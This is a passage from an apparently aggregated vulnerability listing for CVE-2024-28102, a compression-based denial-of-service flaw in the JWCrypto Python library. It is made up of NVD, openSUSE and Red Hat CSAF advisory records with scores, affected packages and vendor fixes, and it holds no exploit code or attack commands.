"url": "https://github.com/latchset/jwcrypto/commit/90477a3b6e73da69740e00b8161f53fea19b831f"
}
]
},
"source": {
"advisory": "GHSA-j857-7rvv-vj97",
"discovery": "UNKNOWN"
}
},
"nvd.nist.gov": {
"cve": {
"descriptions": [
{
"lang": "en",
"value": "JWCrypto implements JWK, JWS, and JWE specifications using python-cryptography. Prior to version 1.5.6, an attacker can cause a denial of service attack by passing in a malicious JWE Token with a high compression ratio. When the server processes this token, it will consume a lot of memory and processing time. Version 1.5.6 fixes this vulnerability by limiting the maximum token length."
},
{
"lang": "es",
"value": "JWCrypto implementa las especificaciones JWK, JWS y JWE utilizando criptograf\u00eda Python. Antes de la versi\u00f3n 1.5.6, un atacante pod\u00eda provocar un ataque de denegaci\u00f3n de servicio al pasar un token JWE malicioso con una alta tasa de compresi\u00f3n. Cuando el servidor procese este token, consumir\u00e1 mucha memoria y tiempo de procesamiento. La versi\u00f3n 1.5.6 corrige esta vulnerabilidad limitando la longitud m\u00e1xima del token."
}
],
"id": "CVE-2024-28102",
"lastModified": "2024-03-21T12:58:51.093",
"metrics": {
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 6.8,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "HIGH",
"scope": "CHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 2.3,
"impactScore": 4.0,
"source": "security-advisories@github.com",
"type": "Secondary"
}
]
},
"published": "2024-03-21T02:52:23.513",
"references": [
{
"source": "security-advisories@github.com",
"url": "https://github.com/latchset/jwcrypto/commit/90477a3b6e73da69740e00b8161f53fea19b831f"
},
{
"source": "security-advisories@github.com",
"url": "https://github.com/latchset/jwcrypto/security/advisories/GHSA-j857-7rvv-vj97"
}
],
"sourceIdentifier": "security-advisories@github.com",
"vulnStatus": "Awaiting Analysis",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-770"
}
],
"source": "security-advisories@github.com",
"type": "Secondary"
}
]
}
}
}
}
OPENSUSE-SU-2024:13798-1
Vulnerability from csaf_opensuse - Published: 2024-06-15 00:00 - Updated: 2024-06-15 00:00| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: openSUSE Tumbleweed:python310-jwcrypto-1.5.6-2.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python310-jwcrypto-1.5.6-2.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python310-jwcrypto-1.5.6-2.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python310-jwcrypto-1.5.6-2.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python311-jwcrypto-1.5.6-2.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python311-jwcrypto-1.5.6-2.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python311-jwcrypto-1.5.6-2.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python311-jwcrypto-1.5.6-2.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python312-jwcrypto-1.5.6-2.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python312-jwcrypto-1.5.6-2.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python312-jwcrypto-1.5.6-2.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python312-jwcrypto-1.5.6-2.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python39-jwcrypto-1.5.6-2.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python39-jwcrypto-1.5.6-2.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python39-jwcrypto-1.5.6-2.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python39-jwcrypto-1.5.6-2.1.x86_64 | — |
Vendor Fix
|
{
"document": {
"aggregate_severity": {
"namespace": "https://www.suse.com/support/security/rating/",
"text": "moderate"
},
"category": "csaf_security_advisory",
"csaf_version": "2.0",
"distribution": {
"text": "Copyright 2024 SUSE LLC. All rights reserved.",
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "en",
"notes": [
{
"category": "summary",
"text": "python310-jwcrypto-1.5.6-2.1 on GA media",
"title": "Title of the patch"
},
{
"category": "description",
"text": "These are all security issues fixed in the python310-jwcrypto-1.5.6-2.1 package on the GA media of openSUSE Tumbleweed.",
"title": "Description of the patch"
},
{
"category": "details",
"text": "openSUSE-Tumbleweed-2024-13798",
"title": "Patchnames"
},
{
"category": "legal_disclaimer",
"text": "CSAF 2.0 data is provided by SUSE under the Creative Commons License 4.0 with Attribution (CC-BY-4.0).",
"title": "Terms of use"
}
],
"publisher": {
"category": "vendor",
"contact_details": "https://www.suse.com/support/security/contact/",
"name": "SUSE Product Security Team",
"namespace": "https://www.suse.com/"
},
"references": [
{
"category": "external",
"summary": "SUSE ratings",
"url": "https://www.suse.com/support/security/rating/"
},
{
"category": "self",
"summary": "URL of this CSAF notice",
"url": "https://ftp.suse.com/pub/projects/security/csaf/opensuse-su-2024_13798-1.json"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2024-28102 page",
"url": "https://www.suse.com/security/cve/CVE-2024-28102/"
}
],
"title": "python310-jwcrypto-1.5.6-2.1 on GA media",
"tracking": {
"current_release_date": "2024-06-15T00:00:00Z",
"generator": {
"date": "2024-06-15T00:00:00Z",
"engine": {
"name": "cve-database.git:bin/generate-csaf.pl",
"version": "1"
}
},
"id": "openSUSE-SU-2024:13798-1",
"initial_release_date": "2024-06-15T00:00:00Z",
"revision_history": [
{
"date": "2024-06-15T00:00:00Z",
"number": "1",
"summary": "Current version"
}
],
"status": "final",
"version": "1"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_version",
"name": "python310-jwcrypto-1.5.6-2.1.aarch64",
"product": {
"name": "python310-jwcrypto-1.5.6-2.1.aarch64",
"product_id": "python310-jwcrypto-1.5.6-2.1.aarch64"
}
},
{
"category": "product_version",
"name": "python311-jwcrypto-1.5.6-2.1.aarch64",
"product": {
"name": "python311-jwcrypto-1.5.6-2.1.aarch64",
"product_id": "python311-jwcrypto-1.5.6-2.1.aarch64"
}
},
{
"category": "product_version",
"name": "python312-jwcrypto-1.5.6-2.1.aarch64",
"product": {
"name": "python312-jwcrypto-1.5.6-2.1.aarch64",
"product_id": "python312-jwcrypto-1.5.6-2.1.aarch64"
}
},
{
"category": "product_version",
"name": "python39-jwcrypto-1.5.6-2.1.aarch64",
"product": {
"name": "python39-jwcrypto-1.5.6-2.1.aarch64",
"product_id": "python39-jwcrypto-1.5.6-2.1.aarch64"
}
}
],
"category": "architecture",
"name": "aarch64"
},
{
"branches": [
{
"category": "product_version",
"name": "python310-jwcrypto-1.5.6-2.1.ppc64le",
"product": {
"name": "python310-jwcrypto-1.5.6-2.1.ppc64le",
"product_id": "python310-jwcrypto-1.5.6-2.1.ppc64le"
}
},
{
"category": "product_version",
"name": "python311-jwcrypto-1.5.6-2.1.ppc64le",
"product": {
"name": "python311-jwcrypto-1.5.6-2.1.ppc64le",
"product_id": "python311-jwcrypto-1.5.6-2.1.ppc64le"
}
},
{
"category": "product_version",
"name": "python312-jwcrypto-1.5.6-2.1.ppc64le",
"product": {
"name": "python312-jwcrypto-1.5.6-2.1.ppc64le",
"product_id": "python312-jwcrypto-1.5.6-2.1.ppc64le"
}
},
{
"category": "product_version",
"name": "python39-jwcrypto-1.5.6-2.1.ppc64le",
"product": {
"name": "python39-jwcrypto-1.5.6-2.1.ppc64le",
"product_id": "python39-jwcrypto-1.5.6-2.1.ppc64le"
}
}
],
"category": "architecture",
"name": "ppc64le"
},
{
"branches": [
{
"category": "product_version",
"name": "python310-jwcrypto-1.5.6-2.1.s390x",
"product": {
"name": "python310-jwcrypto-1.5.6-2.1.s390x",
"product_id": "python310-jwcrypto-1.5.6-2.1.s390x"
}
},
{
"category": "product_version",
"name": "python311-jwcrypto-1.5.6-2.1.s390x",
"product": {
"name": "python311-jwcrypto-1.5.6-2.1.s390x",
"product_id": "python311-jwcrypto-1.5.6-2.1.s390x"
}
},
{
"category": "product_version",
"name": "python312-jwcrypto-1.5.6-2.1.s390x",
"product": {
"name": "python312-jwcrypto-1.5.6-2.1.s390x",
"product_id": "python312-jwcrypto-1.5.6-2.1.s390x"
}
},
{
"category": "product_version",
"name": "python39-jwcrypto-1.5.6-2.1.s390x",
"product": {
"name": "python39-jwcrypto-1.5.6-2.1.s390x",
"product_id": "python39-jwcrypto-1.5.6-2.1.s390x"
}
}
],
"category": "architecture",
"name": "s390x"
},
{
"branches": [
{
"category": "product_version",
"name": "python310-jwcrypto-1.5.6-2.1.x86_64",
"product": {
"name": "python310-jwcrypto-1.5.6-2.1.x86_64",
"product_id": "python310-jwcrypto-1.5.6-2.1.x86_64"
}
},
{
"category": "product_version",
"name": "python311-jwcrypto-1.5.6-2.1.x86_64",
"product": {
"name": "python311-jwcrypto-1.5.6-2.1.x86_64",
"product_id": "python311-jwcrypto-1.5.6-2.1.x86_64"
}
},
{
"category": "product_version",
"name": "python312-jwcrypto-1.5.6-2.1.x86_64",
"product": {
"name": "python312-jwcrypto-1.5.6-2.1.x86_64",
"product_id": "python312-jwcrypto-1.5.6-2.1.x86_64"
}
},
{
"category": "product_version",
"name": "python39-jwcrypto-1.5.6-2.1.x86_64",
"product": {
"name": "python39-jwcrypto-1.5.6-2.1.x86_64",
"product_id": "python39-jwcrypto-1.5.6-2.1.x86_64"
}
}
],
"category": "architecture",
"name": "x86_64"
},
{
"branches": [
{
"category": "product_name",
"name": "openSUSE Tumbleweed",
"product": {
"name": "openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed",
"product_identification_helper": {
"cpe": "cpe:/o:opensuse:tumbleweed"
}
}
}
],
"category": "product_family",
"name": "SUSE Linux Enterprise"
}
],
"category": "vendor",
"name": "SUSE"
}
],
"relationships": [
{
"category": "default_component_of",
"full_product_name": {
"name": "python310-jwcrypto-1.5.6-2.1.aarch64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:python310-jwcrypto-1.5.6-2.1.aarch64"
},
"product_reference": "python310-jwcrypto-1.5.6-2.1.aarch64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python310-jwcrypto-1.5.6-2.1.ppc64le as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:python310-jwcrypto-1.5.6-2.1.ppc64le"
},
"product_reference": "python310-jwcrypto-1.5.6-2.1.ppc64le",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python310-jwcrypto-1.5.6-2.1.s390x as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:python310-jwcrypto-1.5.6-2.1.s390x"
},
"product_reference": "python310-jwcrypto-1.5.6-2.1.s390x",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python310-jwcrypto-1.5.6-2.1.x86_64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:python310-jwcrypto-1.5.6-2.1.x86_64"
},
"product_reference": "python310-jwcrypto-1.5.6-2.1.x86_64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python311-jwcrypto-1.5.6-2.1.aarch64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:python311-jwcrypto-1.5.6-2.1.aarch64"
},
"product_reference": "python311-jwcrypto-1.5.6-2.1.aarch64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python311-jwcrypto-1.5.6-2.1.ppc64le as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:python311-jwcrypto-1.5.6-2.1.ppc64le"
},
"product_reference": "python311-jwcrypto-1.5.6-2.1.ppc64le",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python311-jwcrypto-1.5.6-2.1.s390x as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:python311-jwcrypto-1.5.6-2.1.s390x"
},
"product_reference": "python311-jwcrypto-1.5.6-2.1.s390x",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python311-jwcrypto-1.5.6-2.1.x86_64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:python311-jwcrypto-1.5.6-2.1.x86_64"
},
"product_reference": "python311-jwcrypto-1.5.6-2.1.x86_64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python312-jwcrypto-1.5.6-2.1.aarch64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:python312-jwcrypto-1.5.6-2.1.aarch64"
},
"product_reference": "python312-jwcrypto-1.5.6-2.1.aarch64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python312-jwcrypto-1.5.6-2.1.ppc64le as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:python312-jwcrypto-1.5.6-2.1.ppc64le"
},
"product_reference": "python312-jwcrypto-1.5.6-2.1.ppc64le",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python312-jwcrypto-1.5.6-2.1.s390x as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:python312-jwcrypto-1.5.6-2.1.s390x"
},
"product_reference": "python312-jwcrypto-1.5.6-2.1.s390x",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python312-jwcrypto-1.5.6-2.1.x86_64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:python312-jwcrypto-1.5.6-2.1.x86_64"
},
"product_reference": "python312-jwcrypto-1.5.6-2.1.x86_64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python39-jwcrypto-1.5.6-2.1.aarch64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:python39-jwcrypto-1.5.6-2.1.aarch64"
},
"product_reference": "python39-jwcrypto-1.5.6-2.1.aarch64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python39-jwcrypto-1.5.6-2.1.ppc64le as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:python39-jwcrypto-1.5.6-2.1.ppc64le"
},
"product_reference": "python39-jwcrypto-1.5.6-2.1.ppc64le",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python39-jwcrypto-1.5.6-2.1.s390x as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:python39-jwcrypto-1.5.6-2.1.s390x"
},
"product_reference": "python39-jwcrypto-1.5.6-2.1.s390x",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python39-jwcrypto-1.5.6-2.1.x86_64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:python39-jwcrypto-1.5.6-2.1.x86_64"
},
"product_reference": "python39-jwcrypto-1.5.6-2.1.x86_64",
"relates_to_product_reference": "openSUSE Tumbleweed"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2024-28102",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2024-28102"
}
],
"notes": [
{
"category": "general",
"text": "JWCrypto implements JWK, JWS, and JWE specifications using python-cryptography. Prior to version 1.5.6, an attacker can cause a denial of service attack by passing in a malicious JWE Token with a high compression ratio. When the server processes this token, it will consume a lot of memory and processing time. Version 1.5.6 fixes this vulnerability by limiting the maximum token length.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:python310-jwcrypto-1.5.6-2.1.aarch64",
"openSUSE Tumbleweed:python310-jwcrypto-1.5.6-2.1.ppc64le",
"openSUSE Tumbleweed:python310-jwcrypto-1.5.6-2.1.s390x",
"openSUSE Tumbleweed:python310-jwcrypto-1.5.6-2.1.x86_64",
"openSUSE Tumbleweed:python311-jwcrypto-1.5.6-2.1.aarch64",
"openSUSE Tumbleweed:python311-jwcrypto-1.5.6-2.1.ppc64le",
"openSUSE Tumbleweed:python311-jwcrypto-1.5.6-2.1.s390x",
"openSUSE Tumbleweed:python311-jwcrypto-1.5.6-2.1.x86_64",
"openSUSE Tumbleweed:python312-jwcrypto-1.5.6-2.1.aarch64",
"openSUSE Tumbleweed:python312-jwcrypto-1.5.6-2.1.ppc64le",
"openSUSE Tumbleweed:python312-jwcrypto-1.5.6-2.1.s390x",
"openSUSE Tumbleweed:python312-jwcrypto-1.5.6-2.1.x86_64",
"openSUSE Tumbleweed:python39-jwcrypto-1.5.6-2.1.aarch64",
"openSUSE Tumbleweed:python39-jwcrypto-1.5.6-2.1.ppc64le",
"openSUSE Tumbleweed:python39-jwcrypto-1.5.6-2.1.s390x",
"openSUSE Tumbleweed:python39-jwcrypto-1.5.6-2.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2024-28102",
"url": "https://www.suse.com/security/cve/CVE-2024-28102"
},
{
"category": "external",
"summary": "SUSE Bug 1221230 for CVE-2024-28102",
"url": "https://bugzilla.suse.com/1221230"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:python310-jwcrypto-1.5.6-2.1.aarch64",
"openSUSE Tumbleweed:python310-jwcrypto-1.5.6-2.1.ppc64le",
"openSUSE Tumbleweed:python310-jwcrypto-1.5.6-2.1.s390x",
"openSUSE Tumbleweed:python310-jwcrypto-1.5.6-2.1.x86_64",
"openSUSE Tumbleweed:python311-jwcrypto-1.5.6-2.1.aarch64",
"openSUSE Tumbleweed:python311-jwcrypto-1.5.6-2.1.ppc64le",
"openSUSE Tumbleweed:python311-jwcrypto-1.5.6-2.1.s390x",
"openSUSE Tumbleweed:python311-jwcrypto-1.5.6-2.1.x86_64",
"openSUSE Tumbleweed:python312-jwcrypto-1.5.6-2.1.aarch64",
"openSUSE Tumbleweed:python312-jwcrypto-1.5.6-2.1.ppc64le",
"openSUSE Tumbleweed:python312-jwcrypto-1.5.6-2.1.s390x",
"openSUSE Tumbleweed:python312-jwcrypto-1.5.6-2.1.x86_64",
"openSUSE Tumbleweed:python39-jwcrypto-1.5.6-2.1.aarch64",
"openSUSE Tumbleweed:python39-jwcrypto-1.5.6-2.1.ppc64le",
"openSUSE Tumbleweed:python39-jwcrypto-1.5.6-2.1.s390x",
"openSUSE Tumbleweed:python39-jwcrypto-1.5.6-2.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.8,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"openSUSE Tumbleweed:python310-jwcrypto-1.5.6-2.1.aarch64",
"openSUSE Tumbleweed:python310-jwcrypto-1.5.6-2.1.ppc64le",
"openSUSE Tumbleweed:python310-jwcrypto-1.5.6-2.1.s390x",
"openSUSE Tumbleweed:python310-jwcrypto-1.5.6-2.1.x86_64",
"openSUSE Tumbleweed:python311-jwcrypto-1.5.6-2.1.aarch64",
"openSUSE Tumbleweed:python311-jwcrypto-1.5.6-2.1.ppc64le",
"openSUSE Tumbleweed:python311-jwcrypto-1.5.6-2.1.s390x",
"openSUSE Tumbleweed:python311-jwcrypto-1.5.6-2.1.x86_64",
"openSUSE Tumbleweed:python312-jwcrypto-1.5.6-2.1.aarch64",
"openSUSE Tumbleweed:python312-jwcrypto-1.5.6-2.1.ppc64le",
"openSUSE Tumbleweed:python312-jwcrypto-1.5.6-2.1.s390x",
"openSUSE Tumbleweed:python312-jwcrypto-1.5.6-2.1.x86_64",
"openSUSE Tumbleweed:python39-jwcrypto-1.5.6-2.1.aarch64",
"openSUSE Tumbleweed:python39-jwcrypto-1.5.6-2.1.ppc64le",
"openSUSE Tumbleweed:python39-jwcrypto-1.5.6-2.1.s390x",
"openSUSE Tumbleweed:python39-jwcrypto-1.5.6-2.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2024-06-15T00:00:00Z",
"details": "moderate"
}
],
"title": "CVE-2024-28102"
}
]
}
RHSA-2024:2559
Vulnerability from csaf_redhat - Published: 2024-04-30 13:36 - Updated: 2026-06-02 15:10An uncontrolled resource consumption vulnerability was found in python-jwcrypto. If a malicious JWE token with a high compression ratio is passed to the server, the server will consume a lot of memory and processing time, leading to a denial of service.
{
"document": {
"aggregate_severity": {
"namespace": "https://access.redhat.com/security/updates/classification/",
"text": "Moderate"
},
"category": "csaf_security_advisory",
"csaf_version": "2.0",
"distribution": {
"text": "Copyright \u00a9 Red Hat, Inc. All rights reserved.",
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "en",
"notes": [
{
"category": "summary",
"text": "An update for python-jwcrypto is now available for Red Hat Enterprise Linux 9.",
"title": "Topic"
},
{
"category": "general",
"text": "The python-jwcrypto package provides Python implementations of the JSON Web Key (JWK), JSON Web Signature (JWS), JSON Web Encryption (JWE), and JSON Web Token (JWT) JOSE (JSON Object Signing and Encryption) standards.\n\nSecurity Fix(es):\n\n* python-jwcrypto: malicious JWE token can cause denial of service (CVE-2024-28102)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.",
"title": "Details"
},
{
"category": "legal_disclaimer",
"text": "This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.",
"title": "Terms of Use"
}
],
"publisher": {
"category": "vendor",
"contact_details": "https://access.redhat.com/security/team/contact/",
"issuing_authority": "Red Hat Product Security is responsible for vulnerability handling across all Red Hat products and services.",
"name": "Red Hat Product Security",
"namespace": "https://www.redhat.com"
},
"references": [
{
"category": "self",
"summary": "https://access.redhat.com/errata/RHSA-2024:2559",
"url": "https://access.redhat.com/errata/RHSA-2024:2559"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/updates/classification/#moderate",
"url": "https://access.redhat.com/security/updates/classification/#moderate"
},
{
"category": "external",
"summary": "2268758",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2268758"
},
{
"category": "self",
"summary": "Canonical URL",
"url": "https://security.access.redhat.com/data/csaf/v2/advisories/2024/rhsa-2024_2559.json"
}
],
"title": "Red Hat Security Advisory: python-jwcrypto security update",
"tracking": {
"current_release_date": "2026-06-02T15:10:46+00:00",
"generator": {
"date": "2026-06-02T15:10:46+00:00",
"engine": {
"name": "Red Hat SDEngine",
"version": "4.8.1"
}
},
"id": "RHSA-2024:2559",
"initial_release_date": "2024-04-30T13:36:16+00:00",
"revision_history": [
{
"date": "2024-04-30T13:36:16+00:00",
"number": "1",
"summary": "Initial version"
},
{
"date": "2024-04-30T13:36:16+00:00",
"number": "2",
"summary": "Last updated version"
},
{
"date": "2026-06-02T15:10:46+00:00",
"number": "3",
"summary": "Last generated version"
}
],
"status": "final",
"version": "3"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_name",
"name": "Red Hat Enterprise Linux AppStream (v. 9)",
"product": {
"name": "Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.4.0.Z.MAIN.EUS",
"product_identification_helper": {
"cpe": "cpe:/a:redhat:enterprise_linux:9::appstream"
}
}
}
],
"category": "product_family",
"name": "Red Hat Enterprise Linux"
},
{
"branches": [
{
"category": "product_version",
"name": "python-jwcrypto-0:0.8-5.el9_4.src",
"product": {
"name": "python-jwcrypto-0:0.8-5.el9_4.src",
"product_id": "python-jwcrypto-0:0.8-5.el9_4.src",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/python-jwcrypto@0.8-5.el9_4?arch=src"
}
}
}
],
"category": "architecture",
"name": "src"
},
{
"branches": [
{
"category": "product_version",
"name": "python3-jwcrypto-0:0.8-5.el9_4.noarch",
"product": {
"name": "python3-jwcrypto-0:0.8-5.el9_4.noarch",
"product_id": "python3-jwcrypto-0:0.8-5.el9_4.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/python3-jwcrypto@0.8-5.el9_4?arch=noarch"
}
}
}
],
"category": "architecture",
"name": "noarch"
}
],
"category": "vendor",
"name": "Red Hat"
}
],
"relationships": [
{
"category": "default_component_of",
"full_product_name": {
"name": "python-jwcrypto-0:0.8-5.el9_4.src as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.4.0.Z.MAIN.EUS:python-jwcrypto-0:0.8-5.el9_4.src"
},
"product_reference": "python-jwcrypto-0:0.8-5.el9_4.src",
"relates_to_product_reference": "AppStream-9.4.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3-jwcrypto-0:0.8-5.el9_4.noarch as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.4.0.Z.MAIN.EUS:python3-jwcrypto-0:0.8-5.el9_4.noarch"
},
"product_reference": "python3-jwcrypto-0:0.8-5.el9_4.noarch",
"relates_to_product_reference": "AppStream-9.4.0.Z.MAIN.EUS"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2024-28102",
"cwe": {
"id": "CWE-400",
"name": "Uncontrolled Resource Consumption"
},
"discovery_date": "2024-03-10T00:00:00+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2268758"
}
],
"notes": [
{
"category": "description",
"text": "An uncontrolled resource consumption vulnerability was found in python-jwcrypto. If a malicious JWE token with a high compression ratio is passed to the server, the server will consume a lot of memory and processing time, leading to a denial of service.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "python-jwcrypto: malicious JWE token can cause denial of service",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "The CVE-2024-28102 vulnerability in JWCrypto represents a moderate severity issue due to its potential impact on system availability and resource consumption. While the vulnerability allows for a denial of service (DoS) attack, it requires an attacker to craft a malicious JWE Token with a high compression ratio. This specific condition limits the practical exploitability of the vulnerability to some extent, as it demands a more sophisticated attack approach than common vulnerabilities. Nonetheless, if exploited, the vulnerability can lead to significant memory exhaustion and increased server processing time, impacting the overall performance and availability of the affected system.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"AppStream-9.4.0.Z.MAIN.EUS:python-jwcrypto-0:0.8-5.el9_4.src",
"AppStream-9.4.0.Z.MAIN.EUS:python3-jwcrypto-0:0.8-5.el9_4.noarch"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2024-28102"
},
{
"category": "external",
"summary": "RHBZ#2268758",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2268758"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2024-28102",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-28102"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2024-28102",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-28102"
},
{
"category": "external",
"summary": "https://github.com/latchset/jwcrypto/commit/90477a3b6e73da69740e00b8161f53fea19b831f",
"url": "https://github.com/latchset/jwcrypto/commit/90477a3b6e73da69740e00b8161f53fea19b831f"
},
{
"category": "external",
"summary": "https://github.com/latchset/jwcrypto/security/advisories/GHSA-j857-7rvv-vj97",
"url": "https://github.com/latchset/jwcrypto/security/advisories/GHSA-j857-7rvv-vj97"
}
],
"release_date": "2024-03-08T00:00:00+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2024-04-30T13:36:16+00:00",
"details": "Before applying this update, make sure all previously released errata\nrelevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"AppStream-9.4.0.Z.MAIN.EUS:python-jwcrypto-0:0.8-5.el9_4.src",
"AppStream-9.4.0.Z.MAIN.EUS:python3-jwcrypto-0:0.8-5.el9_4.noarch"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2024:2559"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options don\u0027t meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"AppStream-9.4.0.Z.MAIN.EUS:python-jwcrypto-0:0.8-5.el9_4.src",
"AppStream-9.4.0.Z.MAIN.EUS:python3-jwcrypto-0:0.8-5.el9_4.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
